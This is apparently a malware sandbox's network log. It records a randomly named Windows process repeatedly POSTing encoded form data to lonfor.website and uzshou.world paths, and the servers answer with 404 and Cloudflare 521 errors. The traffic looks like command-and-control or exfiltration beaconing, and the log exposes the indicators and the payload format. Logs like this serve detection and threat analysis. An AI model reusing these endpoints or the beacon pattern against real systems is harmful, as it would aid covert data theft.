Jan 7, 2025 12:25:09.042013884 CET	10912	OUT	POST /stiu/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.lonfor.website Content-Length: 10305 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.lonfor.website Referer: http://www.lonfor.website/stiu/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 48 73 48 4c 50 4b 56 6b 43 48 74 7a 47 72 35 72 6e 42 2b 49 72 43 49 4b 75 71 42 37 34 4e 59 75 31 31 68 62 71 70 35 70 43 55 34 2f 4d 58 71 5a 7a 65 75 34 38 55 6c 42 2b 78 4c 70 78 49 56 48 6b 6c 2b 2b 58 44 69 4f 6a 71 6b 39 39 48 5a 4d 6e 4e 33 77 61 51 34 59 6e 51 68 4f 38 76 43 4c 4c 59 48 68 51 6b 65 78 4a 4b 55 71 33 48 76 78 30 4c 36 51 35 4b 61 38 49 39 35 38 4b 69 53 69 67 4f 61 42 30 30 44 72 64 58 54 43 43 66 30 6a 43 6d 2f 72 2f 70 51 71 71 49 68 4b 4b 64 6a 71 67 38 44 62 67 39 50 56 43 32 47 57 68 76 75 52 4e 59 4d 46 4b 67 30 37 71 73 50 39 54 75 6e 52 30 4b 36 38 68 76 61 77 63 51 62 74 6f 68 6a 58 71 2b 2f 76 56 41 6d 52 35 74 6c 64 47 42 4d 6c 62 76 33 6c 69 36 43 35 50 4c 55 34 50 79 5a 6f 30 6b 36 4b 63 31 35 64 37 30 2b 43 66 50 75 71 62 66 56 44 4e 62 69 5a 4b 6c 66 32 5a 43 66 51 57 46 69 31 64 6b 37 38 41 50 47 41 34 77 74 39 58 47 6e 73 37 52 44 43 2f 63 61 46 65 64 6e 32 59 4c 6e 50 6d 59 37 48 75 75 31 5a 68 34 58 30 63 4f 45 67 2f 63 55 54 42 [TRUNCATED] Data Ascii: Jz1hrtoh=HsHLPKVkCHtzGr5rnB+IrCIKuqB74NYu11hbqp5pCU4/MXqZzeu48UlB+xLpxIVHkl++XDiOjqk99HZMnN3waQ4YnQhO8vCLLYHhQkexJKUq3Hvx0L6Q5Ka8I958KiSigOaB00DrdXTCCf0jCm/r/pQqqIhKKdjqg8Dbg9PVC2GWhvuRNYMFKg07qsP9TunR0K68hvawcQbtohjXq+/vVAmR5tldGBMlbv3li6C5PLU4PyZo0k6Kc15d70+CfPuqbfVDNbiZKlf2ZCfQWFi1dk78APGA4wt9XGns7RDC/caFedn2YLnPmY7Huu1Zh4X0cOEg/cUTBZKUo6Qrmh51aPSZXtI8aHwhdBryur/R0qWpR5iRSJ/w74fbY5ts35SLvXz5Y4VlV878fPeGkiBSi2B1pIRkMqKuNzIhEbwD8ueCHNAvaicziqCZ+7vmJ3VyLSywx2kpCwUlpg41VNr/C+eQgICDLlO/37Bc57OnKZRdhHThhZXYAvRuYr17z3LmQ92KfZq4Hpe9uRsSIOJluBMWRGokHnP8u4B9BoSYwcc2P9PCiY1YAfLThVM+qMcHSbMhRumKrCrfcRNXVq4tZwFz3IpZGKkkt1rgw42h5Q0vfSZTVyxyPa9BLe7oSgWsCYMn8ULMy3zC1MjgUIYmMvMluCFe/PPrNhRmTsqsBkr3wx/ZE5M42A5yvaaPwl000OAKohcdRkunShs6DR3jUtqaWX+l7sDB1awWetPGOmMGpuA0xYEC7ZlsItuVmXwXow4IdMQ5vmkNEVjco+lQshHrMR4OUXKb8js+ryD5dcBzybDjisbfxQOmqifh8/CN+pkVF8Or8uALeXnvZZ9+FY3pBN6igIEf4hmS78Qbp07/P+sxCgGhjzeStWfuguj2vm3k49n+GQPI60UBiNGZSmiF5ZuTdIF9JYkwUKtgs3pXcWAj8OQ/J08l9SGgbxCaVEwajg8UakPWFbehS3TXDH0B4jua4EKQHYchusiN8R6 [TRUNCATED]
Jan 7, 2025 12:25:09.668740988 CET	918	IN	HTTP/1.1 404 Not Found Date: Tue, 07 Jan 2025 11:25:09 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50030	199.192.21.169	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:25:11.583911896 CET	544	OUT	GET /stiu/?Jz1hrtoh=KuvrM/srG3MDLqFPtB2TlzBf7Ls4/9Y6mn0u9MF7YlgnCmWeycT1gm8orALA86E9qUKhYi6qgKN/iUA6gvmuZC9lpzJZsf3hJ4P2cxzhUv0czU+gn/+hx6Q=&UdJ=uBcLexhXPjVX9H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Host: www.lonfor.website Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Jan 7, 2025 12:25:12.174269915 CET	933	IN	HTTP/1.1 404 Not Found Date: Tue, 07 Jan 2025 11:25:12 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50031	188.114.97.3	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:25:25.291850090 CET	804	OUT	POST /ricr/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.uzshou.world Content-Length: 205 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.uzshou.world Referer: http://www.uzshou.world/ricr/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 4f 75 68 70 2b 39 36 69 41 41 43 42 50 79 71 35 66 31 45 77 33 49 75 70 54 77 70 33 44 2b 71 42 79 66 75 45 32 37 55 4c 39 70 44 51 52 6e 68 46 52 38 78 30 45 72 62 50 6c 4f 56 67 4a 6e 39 30 5a 46 66 57 64 5a 54 6f 65 56 52 4b 4a 7a 59 34 55 38 56 66 58 58 43 6f 4d 61 74 57 55 62 2f 59 6e 59 61 36 45 53 64 76 42 4f 71 38 48 44 50 6a 78 45 30 39 6c 57 42 47 41 4c 69 6b 54 48 36 6d 56 52 38 79 38 71 7a 77 39 75 75 6e 66 79 33 46 2b 4d 69 59 79 2b 6b 49 72 54 55 71 70 51 45 4a 49 47 30 69 6c 32 47 45 4b 4c 35 4b 31 62 6b 45 46 32 4e 63 52 46 55 6c 56 76 69 2f 48 41 75 6b 6d 41 3d 3d Data Ascii: Jz1hrtoh=Ouhp+96iAACBPyq5f1Ew3IupTwp3D+qByfuE27UL9pDQRnhFR8x0ErbPlOVgJn90ZFfWdZToeVRKJzY4U8VfXXCoMatWUb/YnYa6ESdvBOq8HDPjxE09lWBGALikTH6mVR8y8qzw9uunfy3F+MiYy+kIrTUqpQEJIG0il2GEKL5K1bkEF2NcRFUlVvi/HAukmA==
Jan 7, 2025 12:25:25.847577095 CET	1236	IN	HTTP/1.1 521 Date: Tue, 07 Jan 2025 11:25:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 6835 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=37WiJNWsj92y361E1%2B7wehSyZg6R5U%2BCiH1ablyCqZx4z15Z1oRAtW%2Fr0LChZy7rxcXvkPvObrLita7EJAe2fVCJj6FrA4WZbA40KyA3W4N%2FqP9db2rE0X1IrDGDQJgtPVPj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8fe3964b99a343e3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1581&rtt_var=790&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=804&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"
Jan 7, 2025 12:25:25.847613096 CET	1236	IN	Data Raw: 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 75 7a 73 68 6f 75 2e 77 6f 72 6c 64 20 7c 20 35 32 31 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 64 6f 77 6e 3c 2f 74 69 74 Data Ascii: > ...<![endif]--><head><title>www.uzshou.world \| 521: Web server is down</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta
Jan 7, 2025 12:25:25.847624063 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 Data Ascii: <div class="w-240 lg:w-full mx-auto"> <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:bor
Jan 7, 2025 12:25:25.847632885 CET	1236	IN	Data Raw: 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 69 63 6f 6e 2d 63 6c 6f 75 64 20 62 6c 6f 63 6b 20 6d 64 3a 68 69 64 64 65 6e 20 68 2d 32 30 20 62 67 2d 63 65 6e 74 65 72 20 62 67 2d 6e 6f 2d 72 65 70 65 61 74 22 3e 3c 2f 73 70 Data Ascii: > <span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span> <span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:block w
Jan 7, 2025 12:25:25.847644091 CET	1236	IN	Data Raw: 2d 36 30 30 20 66 6f 6e 74 2d 6c 69 67 68 74 20 6c 65 61 64 69 6e 67 2d 31 2e 33 22 3e 0a 20 20 20 20 0a 20 20 20 20 48 6f 73 74 0a 20 20 20 20 0a 20 20 3c 2f 68 33 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 65 61 64 69 6e 67 2d 31 2e Data Ascii: -600 font-light leading-1.3"> Host </h3> <span class="leading-1.3 text-2xl text-red-error">Error</span></div> </div> </div> </div> <div class="w-240 lg:w-full mx-auto mb-8 lg:px-
Jan 7, 2025 12:25:25.847655058 CET	1236	IN	Data Raw: 31 22 3e 41 64 64 69 74 69 6f 6e 61 6c 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: 1">Additional troubleshooting information</a>.</p> </div> </div> </div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid bor
Jan 7, 2025 12:25:25.847668886 CET	359	IN	Data Raw: 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 Data Ascii: footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.add

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50032	188.114.97.3	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:25:27.833416939 CET	824	OUT	POST /ricr/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.uzshou.world Content-Length: 225 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.uzshou.world Referer: http://www.uzshou.world/ricr/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 4f 75 68 70 2b 39 36 69 41 41 43 42 50 54 61 35 64 53 59 77 77 6f 75 75 66 51 70 33 61 75 72 47 79 66 79 45 32 36 51 62 39 37 6e 51 52 43 46 46 44 6f 6c 30 48 72 62 50 39 2b 56 6c 55 58 39 72 5a 46 6a 30 64 59 76 6f 65 56 74 4b 4a 33 55 34 55 4c 68 63 59 6e 43 71 48 36 74 51 61 37 2f 59 6e 59 61 36 45 52 67 4b 42 4b 47 38 48 7a 2f 6a 78 68 59 38 35 47 42 48 42 4c 69 6b 5a 58 36 69 56 52 39 52 38 75 37 4a 39 73 57 6e 66 33 7a 46 2b 59 32 66 34 2b 6b 4f 7a 7a 55 68 69 41 4e 59 48 44 5a 56 36 6d 75 78 55 71 52 61 35 39 70 65 55 48 73 4c 44 46 77 57 49 6f 72 4c 4b 44 54 74 39 45 68 71 77 74 74 31 41 75 78 4c 6e 6c 7a 73 67 6d 2f 31 50 51 45 3d Data Ascii: Jz1hrtoh=Ouhp+96iAACBPTa5dSYwwouufQp3aurGyfyE26Qb97nQRCFFDol0HrbP9+VlUX9rZFj0dYvoeVtKJ3U4ULhcYnCqH6tQa7/YnYa6ERgKBKG8Hz/jxhY85GBHBLikZX6iVR9R8u7J9sWnf3zF+Y2f4+kOzzUhiANYHDZV6muxUqRa59peUHsLDFwWIorLKDTt9Ehqwtt1AuxLnlzsgm/1PQE=
Jan 7, 2025 12:25:28.403151035 CET	1236	IN	HTTP/1.1 521 Date: Tue, 07 Jan 2025 11:25:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 6835 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OoEvTU5%2FtGWlVhXLMPUx7OhdBztnGmgzmcegAh28soIrXWEWJ%2BOr8JnkXV9XHKEFjCKKV3jHGnqOSuXmzvArF3v21BIOhAG69PPfs43%2FLW2Y8OYhDvRio82bArhyqKzXAVUa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8fe3965b8dc8433d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1587&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=824&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US">
Jan 7, 2025 12:25:28.403182030 CET	224	IN	Data Raw: 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 75 7a 73 68 6f 75 2e 77 6f 72 6c 64 20 7c 20 35 32 31 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 64 6f 77 6e 3c 2f 74 69 74 6c 65 Data Ascii: ...<![endif]--><head><title>www.uzshou.world \| 521: Web server is down</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="I
Jan 7, 2025 12:25:28.403212070 CET	1236	IN	Data Raw: 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 Data Ascii: E=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" /></head><body><div id="cf-wrapp
Jan 7, 2025 12:25:28.403223038 CET	1236	IN	Data Raw: 64 3a 62 6f 72 64 65 72 2d 30 20 6d 64 3a 62 6f 72 64 65 72 2d 62 20 6d 64 3a 62 6f 72 64 65 72 2d 67 72 61 79 2d 34 30 30 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 66 6c 6f 61 74 2d 6c 65 66 74 20 6d 64 3a 66 6c 6f 61 74 2d 6e 6f 6e 65 Data Ascii: d:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center"> <div class="relative mb-10 md:m-0"> <span class="cf-icon-browser block md:hidden h-20 bg-center bg-no-repeat"></span> <span class="
Jan 7, 2025 12:25:28.403234005 CET	1236	IN	Data Raw: 63 6c 61 73 73 3d 22 6d 64 3a 62 6c 6f 63 6b 20 77 2d 66 75 6c 6c 20 74 72 75 6e 63 61 74 65 22 3e 4e 65 77 61 72 6b 3c 2f 73 70 61 6e 3e 0a 20 20 3c 68 33 20 63 6c 61 73 73 3d 22 6d 64 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 74 2d 33 20 6d Data Ascii: class="md:block w-full truncate">Newark</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=www.uzshou
Jan 7, 2025 12:25:28.403244972 CET	1236	IN	Data Raw: 2d 61 75 74 6f 20 6d 62 2d 38 20 6c 67 3a 70 78 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 Data Ascii: -auto mb-8 lg:px-8"> <div class="clearfix"> <div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed"> <h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2>
Jan 7, 2025 12:25:28.403255939 CET	1236	IN	Data Raw: 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 Data Ascii: border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8fe3965b8dc8433d</strong></span> <span class="cf-footer-separator sm
Jan 7, 2025 12:25:28.403264046 CET	133	IN	Data Raw: 6e 74 4c 69 73 74 65 6e 65 72 26 26 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 64 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 65 72 Data Ascii: ntListener&&a.addEventListener("DOMContentLoaded",d)})();</script></div>... /.error-footer --> </div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50033	188.114.97.3	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
